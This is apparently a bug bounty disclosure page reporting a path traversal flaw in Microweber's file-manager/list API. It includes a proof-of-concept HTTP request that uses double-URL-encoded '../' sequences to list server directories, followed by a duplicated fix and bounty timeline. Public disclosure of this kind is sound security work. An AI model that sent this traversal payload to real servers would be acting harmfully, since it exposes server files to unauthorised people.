/

Improper handling of parameter lead to listing any directory in microweber/microweber

Valid

Reported on

Jul 4th 2022

Description

In file-manager/list API, the server does not handling path parameters properly lead to allow listing any directory. To exploit, use double URL encoding to bypass filter.

Proof of Concept

GET /demo/api/file-manager/list?path=%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/ HTTP/1.1
Host: demo.microweber.org
Cookie: remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CTtYWLvivLcGGOKkv5QqtzWhOA7vw6wZPZIbryyJKGsVNHLLfQ4n75QWDNFH8%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu; back_to_admin=https%3A//demo.microweber.org/demo/admin/; csrf-token-data=%7B%22value%22%3A%22C9vMXphqkoxzEVRFH0KGTbFGUk9B1bo1nbJPMXDQ%22%2C%22expiry%22%3A1656856275047%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
X-Pwnfox-Color: red
Te: trailers
Connection: close

PoC Image

Impact

This vulnerability lead to exposes information about directories and files on the system, allowing attackers to see sensitive files on the server.

We are processing your report and will contact the microweber team within 24 hours. a year ago

We have contacted a member of the microweber team and are waiting to hear back a year ago

Peter Ivanov validated this vulnerability a year ago

Nhien.IT has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Peter Ivanov marked this as fixed in 1.2.20 with commit 585005 a year ago

Peter Ivanov has been awarded the fix bounty

This vulnerability will not receive a CVE

commented a year ago

Maintainer

Hi, thanks for the report.

In order to list the files you need to have admin access.

commented a year ago

Researcher

Thank @maintainer

to join this conversation

We are processing your report and will contact the microweber team within 24 hours. a year ago

We have contacted a member of the microweber team and are waiting to hear back a year ago

Peter Ivanov validated this vulnerability a year ago

Nhien.IT has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Peter Ivanov marked this as fixed in 1.2.20 with commit 585005 a year ago

Peter Ivanov has been awarded the fix bounty

This vulnerability will not receive a CVE

commented a year ago

Maintainer

Hi, thanks for the report.

In order to list the files you need to have admin access.

commented a year ago

Researcher

Thank @maintainer

to join this conversation